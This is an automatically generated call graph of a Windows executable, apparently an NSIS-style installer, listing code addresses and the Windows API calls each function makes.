402175 4626 401446 18 API calls 4625->4626 4627 40217c 4626->4627 4628 401446 18 API calls 4627->4628 4629 402186 4628->4629 4630 4062a3 11 API calls 4629->4630 4634 402197 4629->4634 4630->4634 4631 4021aa EnableWindow 4633 4030e3 4631->4633 4632 40219f ShowWindow 4632->4633 4634->4631 4634->4632 4642 404077 4643 404081 4642->4643 4644 404084 lstrcpynW lstrlenW 4642->4644 4643->4644 4645 405479 4646 405491 4645->4646 4647 4055cd 4645->4647 4646->4647 4648 40549d 4646->4648 4649 40561e 4647->4649 4650 4055de GetDlgItem GetDlgItem 4647->4650 4651 4054a8 SetWindowPos 4648->4651 4652 4054bb 4648->4652 4654 405678 4649->4654 4662 40139d 80 API calls 4649->4662 4653 403d3f 19 API calls 4650->4653 4651->4652 4656 4054c0 ShowWindow 4652->4656 4657 4054d8 4652->4657 4658 405608 SetClassLongW 4653->4658 4655 403daf SendMessageW 4654->4655 4675 4055c8 4654->4675 4684 40568a 4655->4684 4656->4657 4659 4054e0 DestroyWindow 4657->4659 4660 4054fa 4657->4660 4661 40141d 80 API calls 4658->4661 4712 4058dc 4659->4712 4663 405510 4660->4663 4664 4054ff SetWindowLongW 4660->4664 4661->4649 4665 405650 4662->4665 4668 405587 4663->4668 4669 40551c GetDlgItem 4663->4669 4664->4675 4665->4654 4670 405654 SendMessageW 4665->4670 4666 40141d 80 API calls 4666->4684 4667 4058de DestroyWindow EndDialog 4667->4712 4671 403dca 8 API calls 4668->4671 4673 40554c 4669->4673 4674 40552f SendMessageW IsWindowEnabled 4669->4674 4670->4675 4671->4675 4672 40590d ShowWindow 4672->4675 4677 405559 4673->4677 4678 4055a0 SendMessageW 4673->4678 4679 40556c 4673->4679 4687 405551 4673->4687 4674->4673 4674->4675 4676 406805 18 API calls 4676->4684 4677->4678 4677->4687 4678->4668 4682 405574 4679->4682 4683 405589 4679->4683 4680 403d18 SendMessageW 4680->4668 4681 403d3f 19 API calls 4681->4684 4685 40141d 80 API calls 4682->4685 4686 40141d 80 API calls 4683->4686 4684->4666 4684->4667 4684->4675 4684->4676 4684->4681 4688 403d3f 19 API calls 4684->4688 4703 40581e DestroyWindow 4684->4703 4685->4687 4686->4687 4687->4668 4687->4680 4689 405705 GetDlgItem 4688->4689 4690 405723 ShowWindow EnableWindow 4689->4690 4691 40571a 4689->4691 4713 403d85 EnableWindow 4690->4713 4691->4690 4693 40574d EnableWindow 4696 405761 4693->4696 4694 405766 GetSystemMenu EnableMenuItem SendMessageW 4695 405796 SendMessageW 4694->4695 4694->4696 4695->4696 4696->4694 4714 403d98 SendMessageW 4696->4714 4715 406009 lstrcpynW 4696->4715 4699 4057c4 lstrlenW 4700 406805 18 API calls 4699->4700 4701 4057da SetWindowTextW 4700->4701 4702 40139d 80 API calls 4701->4702 4702->4684 4704 405838 CreateDialogParamW 4703->4704 4703->4712 4705 40586b 4704->4705 4704->4712 4706 403d3f 19 API calls 4705->4706 4707 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4706->4707 4708 40139d 80 API calls 4707->4708 4709 4058bc 4708->4709 4709->4675 4710 4058c4 ShowWindow 4709->4710 4711 403daf SendMessageW 4710->4711 4711->4712 4712->4672 4712->4675 4713->4693 4714->4696 4715->4699 4716 4020f9 GetDC GetDeviceCaps 4717 401446 18 API calls 4716->4717 4718 402116 MulDiv 4717->4718 4719 401446 18 API calls 4718->4719 4720 40212c 4719->4720 4721 406805 18 API calls 4720->4721 4722 402165 CreateFontIndirectW 4721->4722 4723 4030dc 4722->4723 4724 4030e3 4723->4724 4726 405f51 wsprintfW 4723->4726 4726->4724 4727 4024fb 4728 40145c 18 API calls 4727->4728 4729 402502 4728->4729 4730 40145c 18 API calls 4729->4730 4731 40250c 4730->4731 4732 40145c 18 API calls 4731->4732 4733 402515 4732->4733 4734 40145c 18 API calls 4733->4734 4735 40251f 4734->4735 4736 40145c 18 API calls 4735->4736 4737 402529 4736->4737 4738 40253d 4737->4738 4739 40145c 18 API calls 4737->4739 4740 4062a3 11 API calls 4738->4740 4739->4738 4741 40256a CoCreateInstance 4740->4741 4742 40258c 4741->4742 4743 40497c GetDlgItem GetDlgItem 4744 4049d2 7 API calls 4743->4744 4749 404bea 4743->4749 4745 404a76 DeleteObject 4744->4745 4746 404a6a SendMessageW 4744->4746 4747 404a81 4745->4747 4746->4745 4750 404ab8 4747->4750 4752 406805 18 API calls 4747->4752 4748 404ccf 4751 404d74 4748->4751 4756 404bdd 4748->4756 4761 404d1e SendMessageW 4748->4761 4749->4748 4759 40484e 5 API calls 4749->4759 4772 404c5a 4749->4772 4755 403d3f 19 API calls 4750->4755 4753 404d89 4751->4753 4754 404d7d SendMessageW 4751->4754 4758 404a9a SendMessageW SendMessageW 4752->4758 4763 404da2 4753->4763 4764 404d9b ImageList_Destroy 4753->4764 4774 404db2 4753->4774 4754->4753 4760 404acc 4755->4760 4762 403dca 8 API calls 4756->4762 4757 404cc1 SendMessageW 4757->4748 4758->4747 4759->4772 4765 403d3f 19 API calls 4760->4765 4761->4756 4767 404d33 SendMessageW 4761->4767 4768 404f6b 4762->4768 4769 404dab GlobalFree 4763->4769 4763->4774 4764->4763 4770 404add 4765->4770 4766 404f1c 4766->4756 4775 404f31 ShowWindow GetDlgItem ShowWindow 4766->4775 4771 404d46 4767->4771 4769->4774 4773 404baa GetWindowLongW SetWindowLongW 4770->4773 4782 404ba4 4770->4782 4785 404b39 SendMessageW 4770->4785 4786 404b67 SendMessageW 4770->4786 4787 404b7b SendMessageW 4770->4787 4781 404d57 SendMessageW 4771->4781 4772->4748 4772->4757 4776 404bc4 4773->4776 4774->4766 4777 404de4 4774->4777 4780 40141d 80 API calls 4774->4780 4775->4756 4778 404be2 4776->4778 4779 404bca ShowWindow 4776->4779 4790 404e12 SendMessageW 4777->4790 4793 404e28 4777->4793 4795 403d98 SendMessageW 4778->4795 4794 403d98 SendMessageW 4779->4794 4780->4777 4781->4751 4782->4773 4782->4776 4785->4770 4786->4770 4787->4770 4788 404ef3 InvalidateRect 4788->4766 4789 404f09 4788->4789 4796 4043ad 4789->4796 4790->4793 4792 404ea1 SendMessageW SendMessageW 4792->4793 4793->4788 4793->4792 4794->4756 4795->4749 4797 4043cd 4796->4797 4798 406805 18 API calls 4797->4798 4799 40440d 4798->4799 4800 406805 18 API calls 4799->4800 4801 404418 4800->4801 4802 406805 18 API calls 4801->4802 4803 404428 lstrlenW wsprintfW SetDlgItemTextW 4802->4803 4803->4766 4804 4026fc 4805 401ee4 4804->4805 4807 402708 4804->4807 4805->4804 4806 406805 18 API calls 4805->4806 4806->4805 4103 4019fd 4104 40145c 18 API calls 4103->4104 4105 401a04 4104->4105 4106 405e7f 2 API calls 4105->4106 4107 401a0b 4106->4107 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 